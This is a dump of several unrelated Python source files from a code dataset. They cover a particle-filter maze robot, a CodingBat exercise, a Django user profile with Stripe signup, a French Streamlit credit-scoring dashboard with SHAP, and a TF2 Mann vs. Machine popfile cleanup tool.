\n        No need to have maze as input as the maze is a variable for the robot\"\"\"\n        return 0\n\n    def rotateServo(self):\n        \"\"\"this function might just be moved to be a part of the measure() function.\"\"\" \n        return 0\n\n    def simulateMeasurements(self):\n        self.prVirtual.calcDistance(self.maze)\n        return self.prVirtual.measurements\n\n    def simulateMove(self,_angle,_distance):\n        print(self.pr.x)\n        self.pr.move(_angle,_distance,self.maze)\n        self.prVirtual.move(_angle,_distance,self.maze)\n        self.x = int(round(self.prVirtual.x))\n        self.y = int(round(self.prVirtual.y))\n        self.orientation = self.prVirtual.orientation\n        print(self.pr.x)\n        print(\"done here\")\n        return 0\n\n    def getSimulatedLocation(self):\n        return self.prVirtual.getStateofParticle()\n\n    def calculateMovementOnPath(self, _distance, _maze):\n        if _distance == 0 or len(_maze.path) == 0:\n            self.movement = [0,0]\n            return\n\n\n        path = _maze.path\n        cellsToTravel = int(_distance/_maze.cellSize)\n\n        startcellY = int(_maze.allNodes[path[len(path)-1]][0])\n        startcellX = int(_maze.allNodes[path[len(path)-1]][1])\n        \n\n        if cellsToTravel > len(path):\n            endCellY = int(_maze.allNodes[path[0]][0])\n            endCellX = int(_maze.allNodes[path[0]][1])\n        else:\n            endCellY = int(_maze.allNodes[path[len(path)-cellsToTravel]][0])\n            endCellX = int(_maze.allNodes[path[len(path)-cellsToTravel]][1])\n\n        xDist = endCellX - startcellX\n        yDist = endCellY - startcellY\n\n        distance = pythagoras(endCellX-startcellX, endCellY-startcellY)\n        orientation = math.atan2(-xDist,yDist)\n\n        rotation = orientation - self.orientation\n        self.movement = [distance,rotation]\n        \n        return 0\n\n    def reset(self):\n        self.pr.rayTracedNodes = {}\n        self.measurement = []\n\n    def updateBelief(self, _x, _y, _orient):\n        self.pr.x = _x\n        self.pr.y = _y\n        self.pr.orientation = _orient\n\n    def correct(self, _correctionDistance):\n        '''corrects for the fact that there is distance between sensor and center of rotation'''\n        self.pr.correct(self.maze.dimX, self.maze.dimY,_correctionDistance)\n        self.prVirtual.correct(self.maze.dimX, self.maze.dimY, _correctionDistance)\n        self.x = int(round(self.prVirtual.x))\n        self.y = int(round(self.prVirtual.y))\n\n\n\ndef pythagoras(length1, length2):\n    \"\"\"calculates the hypotenuse length of a diagonal of a right angled triangle\"\"\"\n    return math.sqrt(math.pow(length1,2) + math.pow(length2,2))\n\n\n\n\n\n\n'''\n#Variables\nx, y; #int\nfloat orientation;\nint speed, rotationSpeed;\nint[2] movement; #array of distance forward as well as rotation. \nfloat[] measurement; #array of measurements. Most likely of size 5\nMaze maze; #robot stores the maze in it's own memory\n\nfloat[] moveVar, moveMean, moveRotVar, moveRotMean; #normal Distribution values for moving forward/backward. Array so values for different speeds can be stored. These values are constants that we hard code. moveRotVar is for the expected rotation while moving forward/backward\nfloat[] rotVar, rotMean; #Normal distribution for rotation\nfloat[] measurementVar, measurementMean; #Normal distribution for measurement\n\nfloat measurementLimHigh,measurementLimLow; #hard coded limits for measurements\n\n#Functions\nvoid move(float distance); #positive values=forward, negative values=backward\nvoid rotate(float angle); #negative or positive values\nvoid measure(); #Updates measurement[] with a series of measurements.\nvoid updateBelief(Particlefilter particleFilter); #updates x, y and rotation\nvoid findPath() #Finds the shortest path out of the maze. 
No need to have maze as input as the maze is a variable for the robot\nvoid rotateServo() # this function might just be moved to be a part of the measure() function.\n'''","repo_name":"timonielsen/Robot-with-Particle-Filter","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28720237741","text":"\n# Given three ints, a b c, return true if one of them is 10 or more less than one of the others.\n\n\n# lessBy10(1, 7, 11) → true\n# lessBy10(1, 7, 10) → false\n# lessBy10(11, 1, 7) → true\n\n\ndef lessBy10(a,b,c):\n diff_ab = abs(a - b)\n diff_ac = abs(a - c)\n diff_bc = abs(b - c)\n \n if diff_ab >= 10 or diff_ac >= 10 or diff_bc >= 10:\n return True\n else:\n return False\n\nprint(lessBy10(1, 7, 11))\nprint(lessBy10(1, 7, 10))\nprint(lessBy10(11, 1, 7))","repo_name":"aamiriqbal071/CodingBat","sub_path":"Logic-1/lessBy10.py","file_name":"lessBy10.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37355866797","text":"from django.db import models\nfrom baseapp.models.timestamp import TimeStamp\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom allauth.account.signals import user_signed_up\nfrom django.dispatch import receiver\nfrom allauth.socialaccount.signals import social_account_added\n\nclass UserProfile(TimeStamp):\n\n \"\"\"\n This model is an extension of the User model that is inbuilt in django.\n It is connected to django User model with a OneToOneField.\n \"\"\"\n user = models.OneToOneField(User,related_name='user',on_delete=models.CASCADE)\n avatar = models.URLField(max_length=255,blank=True,null=True)\n phone_regex = RegexValidator(regex=r'^\\+?([0,7,8,9]{1})}?\\d{9,12}$',\n message=\"Phone number must be entered in the format: '9848281223'. 
Up to 11 digits allowed.\")\n\n phone_number = models.CharField(validators=[phone_regex],max_length=10,verbose_name='User phone number',null=True,blank=True)\n\n fb_profile = models.URLField(max_length=255,null=True,blank=True,default=None)\n gmail_profile = models.URLField(max_length=255,null=True,blank=True,default=None)\n stripe_id = models.CharField(max_length=255,null=True,blank=True,verbose_name='Customer Stripe ID')\n\n\n\n def __str__(self):\n return str(self.id)\n\n\nfrom django.conf import settings\nimport stripe\n\n@receiver(user_signed_up)\ndef create_user_profile(request,user,sociallogin=None,**kwargs):\n if sociallogin:\n new_user = User.objects.get(email=user.email)\n avatar_url = sociallogin.account.get_avatar_url()\n user_profile,created = UserProfile.objects.get_or_create(user=new_user,avatar=avatar_url)\n\n if not user_profile.stripe_id:\n stripe.api_key= settings.STRIPE_SECRET_KEY\n st_customer = stripe.Customer.create(\n name=new_user.first_name,\n email=new_user.email,\n )\n user_profile.stripe_id = st_customer.id\n user_profile.save()\n\n\n\n if sociallogin.account.provider =='google':\n new_user = User.objects.filter(email=user.email)[0]\n profile = UserProfile.objects.filter(user=new_user)[0]\n profile.gmail_profile = sociallogin.account.get_profile_url()\n profile.save()\n elif sociallogin.account.provider =='facebook':\n new_user = User.objects.filter(email=user.email)[0]\n profile = UserProfile.objects.filter(user=new_user)[0]\n print (\"url\",sociallogin.account.get_profile_url())\n profile.fb_profile = sociallogin.account.get_profile_url()\n profile.save()\n","repo_name":"raviarrow88/Django-ecommerce","sub_path":"website/customer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12247213049","text":"import streamlit as st\nimport streamlit.components.v1 as components \nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#import matplotlib\nfrom matplotlib.patches import Rectangle, FancyArrowPatch\nimport pickle\nimport shap\nfrom PIL import Image\nimport requests\nimport json\n\nfrom PIL import Image\nfrom io import BytesIO\n\n\nlogo=Image.open('Ressources/images/logo.png')\ngenre=Image.open('Ressources/images/genre.png')\nsummary_mean=Image.open('Ressources/images/summary_plot_mean.png')\nimportance=Image.open('Ressources/images/importance.png')\nsummary=Image.open('Ressources/images/summary_plot.png')\ntop10_feat=pickle.load(open('Ressources/datasets/top10_feat.pkl', 'rb'))\n#df0=pd.read_csv('df0.csv')\n#df1=pd.read_csv('df1.csv')\nbaseURL = \"http://127.0.0.1:5000\"\ntop9_feat=np.delete(top10_feat,-1)\n\n##########################Les fonctions utilisees#######################################\n#######################################################################################\n#def graph_imp():\n # ''' Representation des features importances \n # globales definies par le model de classification '''\n # test=imp.head(25)\n # feat=test.Features.values\n # fig, ax = plt.subplots()\n # \n # ax=test.plot.bar(x='Features', y='Importances', figsize=(10,5), legend=False, color=sns.color_palette())\n# fig=ax.figure\n #fig.suptitle(\"Best 25 general feature importances\",\n # size=20,\n # y=1.1)\n # return(fig)\n\ndef tachymetre(client_probability, best_th):\n ''' Representation de la probailite d'acceptation \n du credit d'un client donne par rapport au seuil 
'''\n fig, ax = plt.subplots(figsize=(4, 0.3))\n fig.suptitle(f\"Le score de defaut est : {client_probability*100:.2f} \",\n size=8,\n y=1.5)\n ax.add_patch(Rectangle((0, 0), width=best_th * 100, height=1, color='green'))\n ax.add_patch(Rectangle((best_th * 100, 0), width=100 - best_th * 100, height=1, color='red'))\n ax.add_patch(FancyArrowPatch((client_probability * 100, 1), (client_probability * 100, 0), mutation_scale=10))\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 1)\n ax.set_xticks(range(0, 105, 10))\n ax.set_yticks([])\n \n return fig\n\n\ndef minmax_plt(df, feature, feat_disc):\n ''' Representation d'un curseur qui permet l'affichage de l'emplacement des info d'un client donne par rapport a l'intervall des valeurs'''\n client_feat=float(df.loc[feature].values)\n fig, ax = plt.subplots(figsize=(5, 1.5))\n fig.subplots_adjust(bottom=0.6)\n fig.suptitle(f'Valeur client pour feature {feature} est {client_feat:.3f}' ,\n size=10,\n y=1)\n cmap = (mpl.colors.ListedColormap(['firebrick','darkred','firebrick' ]))\n bounds = [feat_disc[0],feat_disc[1],feat_disc[3] ,feat_disc[4]]\n norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n fig.colorbar(\n mpl.cm.ScalarMappable(cmap=cmap, norm=norm),\n cax=ax,\n #extend='both',\n extendfrac='auto',\n ticks=[feat_disc[0],feat_disc[1], feat_disc[2],feat_disc[3],feat_disc[4]],\n spacing='uniform',\n orientation='horizontal',\n )\n \n ax.axvline(feat_disc[2], ls='-', color='silver')\n ax.add_patch(FancyArrowPatch((client_feat, 1), (client_feat, 0), mutation_scale=20))\n label=['min','25%', '50%','75%', 'max']\n for i, x in enumerate(ax.get_xticks()):\n plt.text(x, -0.8, label[i], size=10, ha='center')\n return fig\n\n\ndef kde(df, feature, feat_disc):\n client_feat=float(df.loc[feature].values)\n bw_method=0.5\n xmin = feat_disc[0]\n xmax = feat_disc[4]\n # Plotting\n plt.style.use('seaborn')\n fig = plt.figure(figsize=(5, 5))\n g=df0[feature].plot(kind='kde',\n c='g',\n label='Non-defaulting clients',\n bw_method=bw_method,\n ind=None)\n df1[feature].plot(kind='kde',\n c='r',\n label='Defaulting clients',\n bw_method=bw_method,\n ind=None)\n ax=g.axes\n ax.axvline(client_feat, ls='--', color='r')\n fig.suptitle(\n f'Distribution de {feature} par rapport a la vrai classe des clients',\n y=0.95)\n plt.legend()\n plt.xlabel(feature)\n plt.ylabel('Probability density')\n plt.xlim(xmin, xmax)\n return(fig)\n\n\n###############################################################################\n############################## Menu global a gauche############################\n#################################################################################\nwith st.sidebar:\n st.image(logo)\n \n st.subheader('Menu')\n urlToCall = baseURL+'/clients'\n response = requests.get(urlToCall)\n data_dic = response.json() \n option=st.selectbox('Choisir un client ID: ', data_dic['ids'])\n \n #st.subheader('Menu')\n topic = st.radio(\n 'Choisir un theme',\n ( 'Décision','Informations générales', 'Interpretabilité', 'Analyse comparative', 'Analyse par genre'))\n \n \n urlToCall = baseURL + '/clients-info/' + str(option)\n client=requests.get(urlToCall)\n client=pd.read_json(client.text)\n\n\n\n\n######################################################################################\n # Decision#\n######################################################################################\n\nif topic=='Décision':\n st.title('Prêt à dépenser : Calculateur de droit au crédit')\n st.subheader('Décision sur l\\'éligibilité du client à un crédit') \n urlToCall = baseURL + '/clients/' + 
str(option)\n dic=requests.get(urlToCall)\n data_dic=dic.json()\n pred=data_dic['prediction']\n if pred==0:\n st.write('La demande de crédit est acceptée')\n else:\n st.write('La demande de crédit est refusée')\n \n######################Representation graphique tachymetre#################################\n \n proba_client=data_dic['proba'][1]\n thresh=data_dic['thresh']\n \n fig=tachymetre(proba_client,thresh)\n st.pyplot(fig)\n \n###################################################################################\n #General#\n################################################################################### \nif topic=='Informations générales':\n st.title('Informations générales sur le modèle')\n########################Graphe des feautures importances du model#######################\n st.subheader('Top 15 features importances générées par le modèle')\n #fig=graph_imp()\n st.image(importance, width=700)\n \n###################### Graphe des feature importances par Shap ######################## \n st.subheader('Impact moyen des indicateurs sur la décision (SHAP)')\n st.image(summary_mean)\n \n st.subheader('Shap summary plot : impact des indicateurs sur la prédiction de rejet par instance:')\n st.write ()\n st.image(summary)\n \n \n \n \n \n \n \n###########################################################################################\n #INTERPRETABILITE SHAP#\n###########################################################################################\n\nif topic=='Interpretabilité':\n st.title('Interprétation locale de la décision')\n st.write('L\\'interprétation locale donne l\\'influence indicateurs sur une prédiction de refus de crédit. ')\n#################Force plot d'un client selectionne############################### \n st.subheader('Shap force plot du client')\n def st_shap(plot, height=None):\n shap_html = f\"{shap.getjs()}{plot.html()}\"\n components.html(shap_html, height=height)\n urlToCall = baseURL + '/shap/' + str(option)\n \n dic=requests.get(urlToCall)\n data_dic=dic.json()\n expected=data_dic['expected']\n zipped=data_dic['shap']\n features, shap_values, values=zip(*zipped)\n \n #shap.initjs() \n plot=shap.force_plot(expected, np.array(shap_values), list(features))\n st_shap(plot, 200)\n \n \n################### Waterfall plot d'un client selectionne############################ \n \n \n st.subheader('Shap waterfall')\n explanation=(shap.Explanation(values=np.array(shap_values), base_values=expected, \n data=np.array(values), feature_names=list(features)))\n \n st.components.v1.html(shap.waterfall_plot(explanation, max_display = 15), width=15, height=0, scrolling=True)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n\n st.pyplot(shap.waterfall_plot(explanation, max_display = 15))\n \n###########################################################################################\n #Analyse comparative avec les autres clients#\n###########################################################################################\n\nif topic=='Analyse comparative': \n st.title('Analyse comparative du client par rapport aux autres clients')\n \n st.subheader('Positionnement du client par rapport aux autres clients')\n sel_features = st.multiselect(\"Choisir les indicateurs :\", top9_feat, top9_feat[:2]) \n for i, feat in enumerate(sel_features):\n urlToCall = baseURL + '/feature-info/' + feat\n response = requests.get(urlToCall)\n data_dic = response.json()\n feat_disc=data_dic['feat']\n min_clients=data_dic['min_clients']\n max_clients=data_dic['max_clients']\n 
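# min_clients/max_clients are the client IDs at the feature's extremes,\n        # as returned by the /feature-info endpoint; they fill the tables below.\n        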
list_min=pd.DataFrame(min_clients, columns=['Client ID'])\n list_max=pd.DataFrame(max_clients, columns=['Client ID'])\n \n col1, col2, col3=st.columns([1, 3, 1])\n urlToCall1 = baseURL + '/kde/' +str(option) +'/'+ feat \n response=requests.get(urlToCall1)\n img = Image.open(BytesIO(response.content))\n col2.image(img, width=500)\n \n #fig=kde(client, feat, feat_disc)\n #st.pyplot(fig)\n st.write('Position du client', str(option),' par rapport a', feat)\n fig=minmax_plt(client, feat, feat_disc)\n st.pyplot(fig)\n \n col1, col2 = st.columns(2)\n with col1 : \n \n show_min = st.checkbox('Montrer la liste des clients ayant une valeur minimale', key=feat)\n if show_min:\n st.dataframe(list_min)\n \n with col2:\n show_max = st.checkbox('Montrer la liste des clients ayant une valeur maximale', key=i)\n if show_max:\n st.dataframe(list_max)\n \n \n \n \n###############################################################################\n#### Analyse par genre\n###############################################################################\nif topic == 'Analyse par genre':\n st.title('Exploration des indicateurs en fonction du genre du client')\n col1, col2=st.columns(2)\n with col1:\n client.columns=['Informations client '+ str(option)] \n st.subheader('Informations client')\n st.dataframe(client.loc[top10_feat])\n \n \n #fig=gender_dist_plot(client)\n #st.pyplot(fig)\n \n with col2:\n st.subheader('Distribution des clients par genre')\n st.image(genre, width=500)\n\n st.subheader('Situation du client par rapport aux indicateurs principals en fonction du genre')\n urlToCall = baseURL + '/gender/' + str(option) \n response=requests.get(urlToCall)\n img = Image.open(BytesIO(response.content))\n st.image(img, width=800)\n\n\n\n","repo_name":"MarwaHouri/Open-Classroom-Projet-7-Streamlit","sub_path":"P7-Streamlit.py","file_name":"P7-Streamlit.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14823754297","text":"import os,sys,re,logging as log\nimport argparse\nfrom keyvalues import KeyValues\n\n# Everything not alphanumeric will match this.\n# The + at the end means it'll match an entire block of such characters \n# instead of singular instances.\nREGEX_INVALID_TEMPLATE_KEY_CHARS=re.compile(r'[^a-zA-Z0-9]+')\n\n# Valid Keys.\nValidKeys = [\n\t'Action',\n\t'Advanced',\n\t'Attributes',\n\t'BeginAtWave',\n\t'BehaviorModifiers',\n\t'CanBotsAttackWhileInSpawnRoom',\n\t'CharacterAttributes',\n\t'Checkpoint',\n\t'Class',\n\t'ClassIcon',\n\t'CooldownTime',\n\t'DesiredCount',\n\t'DoneOutput',\n\t'Health',\n\t'InitialCooldown',\n\t'Item',\n\t'MaxActive',\n\t'MaxVisionRange',\n\t'Mission',\n\t'Name',\n\t'Objective',\n\t'OnBombDroppedOutput',\n\t'RandomChoice',\n\t'RespawnWaveTime',\n\t'RunForThisManyWaves',\n\t'Scale',\n\t'Skill',\n\t'Skin',\n\t'Sound',\n\t'SpawnCount',\n\t'Speed',\n\t'Squad',\n\t'StartingCurrency',\n\t'StartingPathTrackNode',\n\t'StartWaveOutput',\n\t'Support',\n\t'Tank',\n\t'Target',\n\t'TeleportWhere',\n\t'Template',\n\t'Templates',\n\t'TFBot',\n\t'TotalCount',\n\t'TotalCurrency',\n\t'WaitBeforeStarting',\n\t'WaitBetweenSpawns',\n\t'WaitForAllSpawned',\n\t'WaitWhenDone',\n\t'Wave',\n\t'WaveSchedule',\n\t'WaveSpawn',\n\t'WeaponRestrictions',\n\t'Where',\n]\n\n# Template data\ntemplates = {}\n\n# TFBot name -> ID associations\nname2template={}\n\n# Template usage counts\ntemplate_uses = {}\n\n# Times a certain template name has been used\nnamecounts={}\n\n# Errors and warning 
stats\nstats={\n\t'warnings':0,\n\t'errors':0\n}\n\n# Duh. Used for Where validation.\nValidSpawns=[\n\t# These ones are virtual.\n\t'BEHIND',\n\t'AHEAD'\n]\n\n# Load up our #base include\ndef importTemplates(file):\n\t_kv = KeyValues()\n\tlog.info(\"Loading {0}\".format(file))\n\t_kv.load(file)\n\tfor id in _kv['Templates']:\n\t\timportTemplate(id,_kv['Templates'][id])\n\ndef importSpawnPoints(file):\n\twith open(file,'r') as f:\n\t\tlog.info('Valid spawns loaded:')\n\t\tfor line in f:\n\t\t\tline=line.strip()\n\t\t\tValidSpawns.append(line)\n\t\t\tlog.info(' '+line)\n\n# Actually import the template\ndef importTemplate(id,template):\n\ttemplates[id]=template\n\tif 'Name' in templates[id]:\n\t\tname=templates[id]['Name']\n\t\tif 'Name' not in name2template:\n\t\t\tname2template[name]=id\n\t\telse:\n\t\t\tif type(name2template[name]) is list:\n\t\t\t\tname2template[name].append(id)\n\t\t\telse:\n\t\t\t\tname2template[name]=[name2template[name],id]\n\n# Export templates to a file.\ndef exportTemplates(file):\n\tkv = KeyValues('WaveSchedule')\n\tlog.info(\"Saving to {0}...\".format(file))\n\tkv['Templates']=KeyValues('Templates')\n\tfor id in templates:\n\t\tkv['Templates'][id]=templates[id]\n\tkv.save(file)\n\tlog.info(\"Saved {0} templates to {1}.\".format(len(templates),file))\n\t\n# Export an entire popfile.\ndef exportPopfile(kv,file):\n\tlog.info(\"Saving to {0}...\".format(file))\n\tif 'Templates' not in kv:\n\t\tkv['Templates']=KeyValues('Templates')\n\tskipped=[]\n\tnew_kv = KeyValues(\"Templates\")\n\tfor id in sorted(templates):\n\t\tif id in template_uses:\n\t\t\tnew_kv[id]=templates[id]\n\t\t\tnew_kv.set_comment(id,'Used {0} times'.format(template_uses[id]),0)\n\t\telse:\n\t\t\tskipped.append(id)\n\tkv['Templates']=new_kv\n\tkv.save(file)\n\tlog.info(\"Saved {0} templates to {1} ({2} skipped).\".format(len(kv['Templates']),file,len(skipped)))\n\ndef checkForValueDuplication(current,template,file,cwd):\n\tfor key in current:\n\t\tif key in template:\n\t\t\tif type(current[key]) is list:\n\t\t\t\tnewValue = []\n\t\t\t\tfor idx in range(len(current[key])):\n\t\t\t\t\tvalue = current[key][idx]\n\t\t\t\t\tckey = '{0}[{1}]'.format(key,idx)\n\t\t\t\t\tif type(template[key]) is list:\n\t\t\t\t\t\tif value in template[key]:\n\t\t\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,ckey,repr(template[key][idx])))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnewValue.append(value)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == template[key]:\n\t\t\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,ckey,repr(template[key][idx])))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnewValue.append(value)\n\t\t\t\tif len(newValue) > 0:\n\t\t\t\t\tcurrent[key]=newValue\n\t\t\t\telse:\n\t\t\t\t\tdel(current[key])\n\t\t\telif type(current[key]) is KeyValues:\n\t\t\t\tcurrent[key]=checkForValueDuplication(current[key],template[key],file,cwd+'/'+key)\n\t\t\t\tif len(current[key])==0:\n\t\t\t\t\tdel(current[key])\n\t\t\telse:\n\t\t\t\tif template[key]==current[key]:\n\t\t\t\t\tdel(current[key])\n\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,key,repr(template[key])))\n\t\t\t\t\t\n\treturn current\n\t\ndef duplicateOf(a,b):\n\tfor key in a:\n\t\tif key in b:\n\t\t\tif type(a[key]) != type(b[key]):\n\t\t\t\treturn False\n\t\t\tif b[key]!=a[key]:\n\t\t\t\treturn False\n\treturn True\n\t\ndef makeOptimizedTemplate(current,file,cwd):\n\tname = current['Name']\n\tif name not in 
namecounts:\n\t\tnamecounts[name]=0\n\tnamecounts[name]+=1\n\tnameToUse=''\n\twhile True:\n\t\t#finalName=name.replace(\" \",\"_\")\n\t\tfinalName=REGEX_INVALID_TEMPLATE_KEY_CHARS.sub('_',name).strip('_')\n\t\tif namecounts[name]>1:\n\t\t\tfinalName='T_OPT_TFBot_{0}_{1}'.format(finalName,namecounts[name])\n\t\telse:\n\t\t\tfinalName='T_OPT_TFBot_{0}'.format(finalName)\n\t\tif (finalName in templates and duplicateOf(current,templates[finalName])) or finalName not in templates:\n\t\t\tnameToUse=finalName\n\t\t\tbreak\n\t\tnamecounts[name]+=1\n\timportTemplate(nameToUse,current)\n\tif nameToUse not in template_uses:\n\t\ttemplate_uses[nameToUse]=1\n\telse:\n\t\ttemplate_uses[nameToUse]+=1\n\tcurrent=KeyValues()\n\tcurrent['Template'] = nameToUse\n\treturn current\n\ndef scanForInvalidTemplates(kv,file,path):\n\tif type(kv) is list:\n\t\tfor i in range(len(kv)):\n\t\t\tvalue = kv[i]\n\t\t\tcwdp=path[:]\n\t\t\tcwdp[-1]=path[-1]+'[{0}]'.format(i)\n\t\t\tcwd = '/'.join(cwdp)\n\t\t\t#print(cwd)\n\t\t\t#print((' '*(len(cwdp)+1))+' [{0}] = {1}'.format(i,type(value)))\n\t\t\tif type(value) is list or type(value) is KeyValues:\n\t\t\t\tkv[i]=scanForInvalidTemplates(value,file,cwdp)\n\t\t\t\tcontinue\n\t\treturn kv\n\tfor key in kv:\n\t\tif key not in kv:\n\t\t\tcontinue\n\t\tvalue=kv[key]\n\t\tcwdp = path+[key]\n\t\tparent=cwdp[-2]\n\t\t#print((' '*len(cwdp))+' {0} = {1}'.format(key,type(value)))\n\t\tcwd = '/'.join(cwdp)\n\t\tif key not in ValidKeys:\n\t\t\tif parent not in ['Templates','CharacterAttributes']:\n\t\t\t\tfoundCorrectCase=False\n\t\t\t\tfor vkey in ValidKeys:\n\t\t\t\t\tif vkey.lower() == key.lower():\n\t\t\t\t\t\tlog.warning('{0} > {1}: Key \"{2}\" has bad capitalization! The correct form is \"{3}\".'.format(file,cwd,key,vkey))\n\t\t\t\t\t\tstats['warnings']+=1\n\t\t\t\t\t\tfoundCorrectCase=True\n\t\t\t\t\t\ttemp = kv[key]\n\t\t\t\t\t\tdel kv[key]\n\t\t\t\t\t\tkv[vkey] = temp\n\t\t\t\t\t\tkey=vkey\n\t\t\t\t\t\tbreak\n\t\t\t\tif not foundCorrectCase:\n\t\t\t\t\tlog.warning('{0} > {1}: Unidentified key \"{2}\"!'.format(file,cwd,key))\n\t\t\t\t\tstats['warnings']+=1\n\t\tif type(value) is list or type(value) is KeyValues:\n\t\t\tkv[key]=scanForInvalidTemplates(value,file,cwdp)\n\t\t\tif type(value) is list:\n\t\t\t\tif key == 'Wave':\n\t\t\t\t\t#print(repr(value))\n\t\t\t\t\tfor i in range(len(value)):\n\t\t\t\t\t\tkv.set_comment_list(key,i,'Wave {0}'.format(i+1),1)\n\t\t\t\tif key == 'WaveSpawn' and cwdp[-2].split('[')[0] == 'Wave':\n\t\t\t\t\tparentWaveNumber = cwdp[-2].split('[')[1].strip(']')\n\t\t\t\t\tparentWaveNumber = int(parentWaveNumber)\n\t\t\t\t\tif type(value) is list:\n\t\t\t\t\t\tfor i in range(len(value)):\n\t\t\t\t\t\t\tkv.set_comment_list(key,i,'Wave {0}.{1}'.format(parentWaveNumber+1,i+1),1)\n\t\t\t\t\telif type(value) is KeyValues:\n\t\t\t\t\t\tkv.set_comment(key,'Wave {0}.{1}'.format(parentWaveNumber+1,1),1)\n\t\t\tcontinue\n\t\tif key == 'Where':\n\t\t\tif value not in ValidSpawns:\n\t\t\t\tlog.warning('{0} > {1}: Spawnpoint \"{2}\" not defined on the map!'.format(file,cwd,value))\n\t\t\t\tstats['warnings']+=1\n\t\tif key == 'Template':\n\t\t\tif value not in templates:\n\t\t\t\tlog.warning('{0} > {1}: Unable to find Template \"{2}\"!'.format(file,cwd,value))\n\t\t\t\tstats['warnings']+=1\n\t\t\tif 'Templates' in cwdp:\n\t\t\t\tprint(repr(cwd))\n\t\t\telse:\n\t\t\t\tif cwdp[-2].split('[')[0] != 'TFBot':\n\t\t\t\t\tlog.warning('{0} > {1}: Template directive contained in \"{2}\" instead of 
TFBot!'.format(file,cwd,cwdp[-2].split('[')[0]))\n\t\t\t\t\tstats['warnings']+=1\n\t\t\tif value not in template_uses:\n\t\t\t\ttemplate_uses[value]=1\n\t\t\telse:\n\t\t\t\ttemplate_uses[value]+=1\n\t\t\t# Check to see if values match parent\n\t\t\tif value in templates:\n\t\t\t\tkv=checkForValueDuplication(kv,templates[value],file,cwd)\n\t\t\t\n\t\tif cwdp[-2].split('[')[0] == 'TFBot' or cwdp[-2] == 'Templates':\n\t\t\tif key == 'Name':\n\t\t\t\tif value in name2template:\n\t\t\t\t\tif type(name2template[value]) is not list:\n\t\t\t\t\t\tlog.warning('{0} > {1}: TFBot named \"{2}\" might need Template \"{3}\"! This has automatically been done for you.'.format(file,cwd,value,name2template[value]))\n\t\t\t\t\t\tkv['Template']=name2template[value]\n\t\t\t\t\t\tkv._children.move_to_end('Template',last=False)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Check to see if values match parent\n\t\t\t\t\t\tfixedCwd = '/'.join(cwdp[:-1])\n\t\t\t\t\t\tkv=checkForValueDuplication(kv,templates[name2template[value]],file,fixedCwd)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif name2template[value] not in template_uses:\n\t\t\t\t\t\t\ttemplate_uses[name2template[value]]=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttemplate_uses[name2template[value]]+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.warning('{0} > {1}: TFBot named \"{2}\" might need a Template from any of the following examples:'.format(file,cwd,value))\n\t\t\t\t\t\tfor tplID in name2template[value]:\n\t\t\t\t\t\t\tlog.info(' Template \"{0}\"'.format(tplID))\n\t\t\t\t\tstats['warnings']+=1\n\t\t\t\telse:\n\t\t\t\t\t# Optimize\n\t\t\t\t\tkv = makeOptimizedTemplate(kv,file,cwd)\n\treturn kv\n\t\n#importTemplates('includes/robot_standard.pop')\n#importTemplates('includes/robot_giant.pop')\n\nparser = argparse.ArgumentParser(description='Clean up and optimize TF2 MvM Popfiles')\n\n# -o --output Specify output file\nparser.add_argument('-o', '--output', nargs='?', default='', help='Specify where the completed file should go')\n# -i --include Include templates from a file\nparser.add_argument('-i', '--include', nargs='*', default=['includes/robot_giant.pop','includes/robot_standard.pop'], help='Include templates from a file')\n# -s --spawnpoints Load valid spawnpoint targetnames from a file\nparser.add_argument('-s', '--spawnpoints', nargs='?', default='', help='Load valid spawnpoint targetnames from a file')\nparser.add_argument('input_file', nargs=1, help='The popfile to be processed.')\n\n# Example invocation: python fixPopfiles.py -s spawnpoints.txt -o out/mission.pop mission.pop\nargs = parser.parse_args()\n\noutfile = args.output\nif outfile == '':\n\t# args.input_file is a one-element list because of nargs=1\n\toutfile=args.input_file[0]+'.new'\noutfile = os.path.abspath(outfile)\noutdir = os.path.dirname(outfile)\nif not os.path.isdir(outdir):\n\tos.makedirs(outdir)\n\nlog.basicConfig(format='%(asctime)s [%(levelname)-8s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', filename=outfile+'.log',filemode='w',level=log.DEBUG)\n\nfor included_file in args.include:\n\timportTemplates(included_file)\n\nif args.spawnpoints != '':\n\timportSpawnPoints(args.spawnpoints)\n\nkv = KeyValues()\nkv.load(args.input_file[0])\nif 'Templates' in kv:\n\tfor id in kv['Templates']:\n\t\ttemplates[id]=kv['Templates'][id]\nlog.info('Loaded {0} templates.'.format(len(templates)))\n\nscanForInvalidTemplates(kv,args.input_file[0],['WaveSchedule'])\n\nlog.info('Finished scanning: {0} warnings, {1} errors.'.format(stats['warnings'],stats['errors']))\n\nlog.info('Used templates: {0}'.format(len(template_uses)))\nfor key in sorted(template_uses.keys()):\n\tlog.info('Template {0}: Used {1} 
